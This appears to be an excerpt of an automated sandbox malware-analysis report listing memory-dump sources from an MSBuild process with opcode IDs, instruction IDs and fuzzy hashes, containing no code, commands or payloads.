                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b7043a6777d234e4d2b1b9b64127eb9bf4423c4d2a2528f7d9e9991e7045b5ab
                                                                  • Instruction ID: 53e536e99e81595eabab6210a145e690c5d5b31c46263f52d16ad3933d33c755
                                                                  • Opcode Fuzzy Hash: b7043a6777d234e4d2b1b9b64127eb9bf4423c4d2a2528f7d9e9991e7045b5ab
                                                                  • Instruction Fuzzy Hash: B8014CB0E10319DFEB25CF6AC4043EE7BF1AF45311F248269D454AA1A0D3745A40CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586159739.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_70d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6de69770e7c4ea9a0819e92a08394609c200700dcdb41d6e379993b181b2add2
                                                                  • Instruction ID: 256602672ac344f545614808ec85808324aad020c62614de6173de697460cde4
                                                                  • Opcode Fuzzy Hash: 6de69770e7c4ea9a0819e92a08394609c200700dcdb41d6e379993b181b2add2
                                                                  • Instruction Fuzzy Hash: CDF06271404344EFE7208B56CC88B66FFD8EB91734F18C55AED484B286C278AC44CA75
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9cb21ce4a7c6f496d06a7ff2fc63e80004509877d3503bd2867961a60591d559
                                                                  • Instruction ID: da27945533c777630d207a93480a49c893f60f03041529deb020ae441472f5dd
                                                                  • Opcode Fuzzy Hash: 9cb21ce4a7c6f496d06a7ff2fc63e80004509877d3503bd2867961a60591d559
                                                                  • Instruction Fuzzy Hash: CBF0E2727082449FD3018B6A9C84AABFFFDEFDB62071540AFE044CB362C9709C0183A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 353c729ed3b9e5eb6a3af60350a6744aa30eec1a251ab427196996edbc89dc28
                                                                  • Instruction ID: c201bd210d65b3d95db61a7a97e7844b2748db19f08b286e38f31fc314675bcb
                                                                  • Opcode Fuzzy Hash: 353c729ed3b9e5eb6a3af60350a6744aa30eec1a251ab427196996edbc89dc28
                                                                  • Instruction Fuzzy Hash: 0901E8B0E10319DFDB25DF6AC4043AEBAF1BF48355F108265E424AA2A0D7745A40CFE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 246a0f4c8f6caa2d00622f9d9c398998ff7b2ea318589fd9996eea5d07cbe488
                                                                  • Instruction ID: 6a003347929bf5b2cfec357049dff9df253f08717fc82da7bb67ef4606f0c672
                                                                  • Opcode Fuzzy Hash: 246a0f4c8f6caa2d00622f9d9c398998ff7b2ea318589fd9996eea5d07cbe488
                                                                  • Instruction Fuzzy Hash: 73E09B717002149FD3049A5EDC44E5BF7EDFFD9630B21407AF504D7351C970AC0086A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c25011a689777b17d6118a6b4bf413dfd68baecf74d0db308daf26c6470fa8f2
                                                                  • Instruction ID: 788e1d37102cbe065d635f4230ff122e08716d1d1fd4782c1f42a580109ebaa6
                                                                  • Opcode Fuzzy Hash: c25011a689777b17d6118a6b4bf413dfd68baecf74d0db308daf26c6470fa8f2
                                                                  • Instruction Fuzzy Hash: 31F065B67496405FD3118B2AD8D4D45FFA4EF9A63071540AAF549CB363D5209D06C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6acd15577d569e57eb58b3c9f89a8c4d745dbc706ed17696c3cfe884f414196
                                                                  • Instruction ID: f7780e727a3618e0f55d3ca8f59ba7c3b030afd4018a1923b138fb8fb67a81e4
                                                                  • Opcode Fuzzy Hash: c6acd15577d569e57eb58b3c9f89a8c4d745dbc706ed17696c3cfe884f414196
                                                                  • Instruction Fuzzy Hash: 06F02B757641408FC7058B69A4900387BFBFFCA52135A80EED14DD7353DD21AC06C310
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3e5c9af9bef177c55e2415cd55c069602d2f8e88ccddfecb198d30da3eb95b12
                                                                  • Instruction ID: 49653cf839d3357caf82423ff2b7860a1d6848dda746b318c65bdabc8fb78c72
                                                                  • Opcode Fuzzy Hash: 3e5c9af9bef177c55e2415cd55c069602d2f8e88ccddfecb198d30da3eb95b12
                                                                  • Instruction Fuzzy Hash: 60F030B5E10714AF8B34CFA9D8008AAFBF9EF48711B00856EE455D3600D731E9548B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bce579f2696d1d00d840b55af481bd7c2fb9a63411ac7d2ea6b66c23c3eb8bd4
                                                                  • Instruction ID: dbe275b31d6c0abb5d86b031dd3c22edee0d6356e30c1b3551db6f98e709ae2f
                                                                  • Opcode Fuzzy Hash: bce579f2696d1d00d840b55af481bd7c2fb9a63411ac7d2ea6b66c23c3eb8bd4
                                                                  • Instruction Fuzzy Hash: DFF082F4E04301AF9B25CFA994008AABFF6EB48210B0445AED581C7111D731E525CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2588095660.0000000001130000.00000040.00000400.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1130000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%